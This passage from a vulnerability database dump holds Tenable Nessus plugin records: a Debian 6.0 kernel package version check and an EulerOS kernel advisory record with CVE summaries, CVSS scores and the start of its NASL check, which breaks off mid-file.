script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-tools-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"firmware-linux-free\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-base\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-doc-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-486\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-i386\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-openvz\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"linux-headers-2.6.32-5-common-vserver\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-xen\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-486\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686-dbg\", 
reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-libc-dev\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-manual-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-patch-debian-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-source-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-support-2.6.32-5\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-tools-2.6.32\", 
reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T08:57:12", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644)\n\n - The Btrfs implementation in the Linux kernel before\n 3.19 does not ensure that the visible xattr state is\n consistent with a requested replacement, which allows\n local users to bypass intended ACL settings and gain\n privileges via standard filesystem operations (1)\n during an xattr-replacement time window, related to a\n race condition, or (2) after an xattr-replacement\n attempt that fails because the data does not\n fit.(CVE-2014-9710)\n\n - An integer overflow flaw was found in the way the Linux\n kernel's netfilter connection tracking implementation\n loaded extensions. 
An attacker on a local network could\n potentially send a sequence of specially crafted\n packets that would initiate the loading of a large\n number of extensions, causing the targeted system in\n that network to crash.(CVE-2014-9715)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9728)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9729)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9730)\n\n - A path length checking flaw was found in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support. 
An\n attacker able to mount a corrupted/malicious UDF file\n system image could use this flaw to leak kernel memory\n to user-space.(CVE-2014-9731)\n\n - The snd_compr_tstamp function in\n sound/core/compress_offload.c in the Linux kernel\n through 4.7, as used in Android before 2016-08-05 on\n Nexus 5 and 7 (2013) devices, does not properly\n initialize a timestamp data structure, which allows\n attackers to obtain sensitive information via a crafted\n application, aka Android internal bug 28770164 and\n Qualcomm internal bug CR568717.(CVE-2014-9892)\n\n - drivers/media/media-device.c in the Linux kernel before\n 3.11, as used in Android before 2016-08-05 on Nexus 5\n and 7 (2013) devices, does not properly initialize\n certain data structures, which allows local users to\n obtain sensitive information via a crafted application,\n aka Android internal bug 28750150 and Qualcomm internal\n bug CR570757, a different vulnerability than\n CVE-2014-1739.(CVE-2014-9895)\n\n - The ethtool_get_wol function in net/core/ethtool.c in\n the Linux kernel through 4.7, as used in Android before\n 2016-08-05 on Nexus 5 and 7 (2013) devices, does not\n initialize a certain data structure, which allows local\n users to obtain sensitive information via a crafted\n application, aka Android internal bug 28803952 and\n Qualcomm internal bug CR570754.(CVE-2014-9900)\n\n - The snd_compress_check_input function in\n sound/core/compress_offload.c in the ALSA subsystem in\n the Linux kernel before 3.17 does not properly check\n for an integer overflow, which allows local users to\n cause a denial of service (insufficient memory\n allocation) or possibly have unspecified other impact\n via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl\n call.(CVE-2014-9904)\n\n - A race condition in the ip4_datagram_release_cb\n function in net/ipv4/datagram.c in the Linux kernel\n allows local users to gain privileges or cause a denial\n of service (use-after-free) by leveraging incorrect\n expectations about 
locking during multithreaded access\n to internal data structures for IPv4 UDP\n sockets.(CVE-2014-9914)\n\n - A flaw was discovered in the way the kernel allows\n stackable filesystems to overlay. A local attacker who\n is able to mount filesystems can abuse this flaw to\n escalate privileges.(CVE-2014-9922)\n\n - The regulator_ena_gpio_free function in\n drivers/regulator/core.c in the Linux kernel allows\n local users to gain privileges or cause a denial of\n service (use-after-free) via a crafted\n application.(CVE-2014-9940)\n\n - It was found that the Linux kernel KVM subsystem's\n sysenter instruction emulation was not sufficient. An\n unprivileged guest user could use this flaw to escalate\n their privileges by tricking the hypervisor to emulate\n a SYSENTER instruction in 16-bit mode, if the guest OS\n did not initialize the SYSENTER model-specific\n registers (MSRs). Note: Certified guest operating\n systems for Red Hat Enterprise Linux with KVM do\n initialize the SYSENTER MSRs and are thus not\n vulnerable to this issue when running on a KVM\n hypervisor.(CVE-2015-0239)\n\n - A flaw was found in the way the Linux kernel's XFS file\n system handled replacing of remote attributes under\n certain conditions. A local user with access to XFS\n file system mount could potentially use this flaw to\n escalate their privileges on the system.(CVE-2015-0274)\n\n - A flaw was found in the way the Linux kernel's ext4\n file system handled the 'page size i1/4z block size'\n condition when the fallocate zero range functionality\n was used. A local attacker could use this flaw to crash\n the system.(CVE-2015-0275)\n\n - It was found that the Linux kernel's keyring\n implementation would leak memory when adding a key to a\n keyring via the add_key() function. 
A local attacker\n could use this flaw to exhaust all available memory on\n the system.(CVE-2015-1333)\n\n - Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel through 3.19.1 allows\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function.(CVE-2015-1420)\n\n - A use-after-free flaw was found in the way the Linux\n kernel's SCTP implementation handled authentication key\n reference counting during INIT collisions. A remote\n attacker could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2015-1421)\n\n - The IPv4 implementation in the Linux kernel before\n 3.18.8 does not properly consider the length of the\n Read-Copy Update (RCU) grace period for redirecting\n lookups in the absence of caching, which allows remote\n attackers to cause a denial of service (memory\n consumption or system crash) via a flood of\n packets.(CVE-2015-1465)\n\n - A flaw was found in the way the nft_flush_table()\n function of the Linux kernel's netfilter tables\n implementation flushed rules that were referencing\n deleted chains. A local user who has the CAP_NET_ADMIN\n capability could use this flaw to crash the\n system.(CVE-2015-1573)\n\n - An integer overflow flaw was found in the way the Linux\n kernel randomized the stack for processes on certain\n 64-bit architecture systems, such as x86-64, causing\n the stack entropy to be reduced by four.(CVE-2015-1593)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1485)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-9715", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-1739", "CVE-2014-9940", "CVE-2015-0274", "CVE-2014-9728", "CVE-2015-1421", "CVE-2015-1465", "CVE-2014-9730", "CVE-2014-9904", "CVE-2014-9900", "CVE-2014-9895", "CVE-2014-9914", "CVE-2014-9922", "CVE-2015-0239", "CVE-2014-9729", "CVE-2015-1333", "CVE-2015-0275", "CVE-2015-1573", "CVE-2014-9710", "CVE-2014-9731", "CVE-2014-9892"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1485.NASL", "href": "https://www.tenable.com/plugins/nessus/124809", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124809);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2014-9644\",\n \"CVE-2014-9710\",\n \"CVE-2014-9715\",\n \"CVE-2014-9728\",\n \"CVE-2014-9729\",\n \"CVE-2014-9730\",\n \"CVE-2014-9731\",\n \"CVE-2014-9892\",\n \"CVE-2014-9895\",\n \"CVE-2014-9900\",\n \"CVE-2014-9904\",\n \"CVE-2014-9914\",\n \"CVE-2014-9922\",\n \"CVE-2014-9940\",\n \"CVE-2015-0239\",\n \"CVE-2015-0274\",\n \"CVE-2015-0275\",\n \"CVE-2015-1333\",\n 
\"CVE-2015-1420\",\n \"CVE-2015-1421\",\n \"CVE-2015-1465\",\n \"CVE-2015-1573\",\n \"CVE-2015-1593\"\n );\n script_bugtraq_id(\n 72320,\n 72356,\n 72357,\n 72435,\n 72552,\n 72607,\n 72842,\n 73156,\n 73308,\n 73953,\n 74964,\n 75001,\n 75139\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1485)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644)\n\n - The Btrfs implementation in the Linux kernel before\n 3.19 does not ensure that the visible xattr state is\n consistent with a requested replacement, which allows\n local users to bypass intended ACL settings and gain\n privileges via standard filesystem operations (1)\n during an xattr-replacement time window, related to a\n race condition, or (2) after an xattr-replacement\n attempt that fails because the data does not\n fit.(CVE-2014-9710)\n\n - An integer overflow flaw was found in the way the Linux\n kernel's netfilter connection tracking implementation\n loaded extensions. 
An attacker on a local network could\n potentially send a sequence of specially crafted\n packets that would initiate the loading of a large\n number of extensions, causing the targeted system in\n that network to crash.(CVE-2014-9715)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9728)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9729)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9730)\n\n - A path length checking flaw was found in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support. 
An\n attacker able to mount a corrupted/malicious UDF file\n system image could use this flaw to leak kernel memory\n to user-space.(CVE-2014-9731)\n\n - The snd_compr_tstamp function in\n sound/core/compress_offload.c in the Linux kernel\n through 4.7, as used in Android before 2016-08-05 on\n Nexus 5 and 7 (2013) devices, does not properly\n initialize a timestamp data structure, which allows\n attackers to obtain sensitive information via a crafted\n application, aka Android internal bug 28770164 and\n Qualcomm internal bug CR568717.(CVE-2014-9892)\n\n - drivers/media/media-device.c in the Linux kernel before\n 3.11, as used in Android before 2016-08-05 on Nexus 5\n and 7 (2013) devices, does not properly initialize\n certain data structures, which allows local users to\n obtain sensitive information via a crafted application,\n aka Android internal bug 28750150 and Qualcomm internal\n bug CR570757, a different vulnerability than\n CVE-2014-1739.(CVE-2014-9895)\n\n - The ethtool_get_wol function in net/core/ethtool.c in\n the Linux kernel through 4.7, as used in Android before\n 2016-08-05 on Nexus 5 and 7 (2013) devices, does not\n initialize a certain data structure, which allows local\n users to obtain sensitive information via a crafted\n application, aka Android internal bug 28803952 and\n Qualcomm internal bug CR570754.(CVE-2014-9900)\n\n - The snd_compress_check_input function in\n sound/core/compress_offload.c in the ALSA subsystem in\n the Linux kernel before 3.17 does not properly check\n for an integer overflow, which allows local users to\n cause a denial of service (insufficient memory\n allocation) or possibly have unspecified other impact\n via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl\n call.(CVE-2014-9904)\n\n - A race condition in the ip4_datagram_release_cb\n function in net/ipv4/datagram.c in the Linux kernel\n allows local users to gain privileges or cause a denial\n of service (use-after-free) by leveraging incorrect\n expectations about 
locking during multithreaded access\n to internal data structures for IPv4 UDP\n sockets.(CVE-2014-9914)\n\n - A flaw was discovered in the way the kernel allows\n stackable filesystems to overlay. A local attacker who\n is able to mount filesystems can abuse this flaw to\n escalate privileges.(CVE-2014-9922)\n\n - The regulator_ena_gpio_free function in\n drivers/regulator/core.c in the Linux kernel allows\n local users to gain privileges or cause a denial of\n service (use-after-free) via a crafted\n application.(CVE-2014-9940)\n\n - It was found that the Linux kernel KVM subsystem's\n sysenter instruction emulation was not sufficient. An\n unprivileged guest user could use this flaw to escalate\n their privileges by tricking the hypervisor to emulate\n a SYSENTER instruction in 16-bit mode, if the guest OS\n did not initialize the SYSENTER model-specific\n registers (MSRs). Note: Certified guest operating\n systems for Red Hat Enterprise Linux with KVM do\n initialize the SYSENTER MSRs and are thus not\n vulnerable to this issue when running on a KVM\n hypervisor.(CVE-2015-0239)\n\n - A flaw was found in the way the Linux kernel's XFS file\n system handled replacing of remote attributes under\n certain conditions. A local user with access to XFS\n file system mount could potentially use this flaw to\n escalate their privileges on the system.(CVE-2015-0274)\n\n - A flaw was found in the way the Linux kernel's ext4\n file system handled the 'page size i1/4z block size'\n condition when the fallocate zero range functionality\n was used. A local attacker could use this flaw to crash\n the system.(CVE-2015-0275)\n\n - It was found that the Linux kernel's keyring\n implementation would leak memory when adding a key to a\n keyring via the add_key() function. 
A local attacker\n could use this flaw to exhaust all available memory on\n the system.(CVE-2015-1333)\n\n - Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel through 3.19.1 allows\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function.(CVE-2015-1420)\n\n - A use-after-free flaw was found in the way the Linux\n kernel's SCTP implementation handled authentication key\n reference counting during INIT collisions. A remote\n attacker could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2015-1421)\n\n - The IPv4 implementation in the Linux kernel before\n 3.18.8 does not properly consider the length of the\n Read-Copy Update (RCU) grace period for redirecting\n lookups in the absence of caching, which allows remote\n attackers to cause a denial of service (memory\n consumption or system crash) via a flood of\n packets.(CVE-2015-1465)\n\n - A flaw was found in the way the nft_flush_table()\n function of the Linux kernel's netfilter tables\n implementation flushed rules that were referencing\n deleted chains. A local user who has the CAP_NET_ADMIN\n capability could use this flaw to crash the\n system.(CVE-2015-1573)\n\n - An integer overflow flaw was found in the way the Linux\n kernel randomized the stack for processes on certain\n 64-bit architecture systems, such as x86-64, causing\n the stack entropy to be reduced by four.(CVE-2015-1593)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1485\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c41fa7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
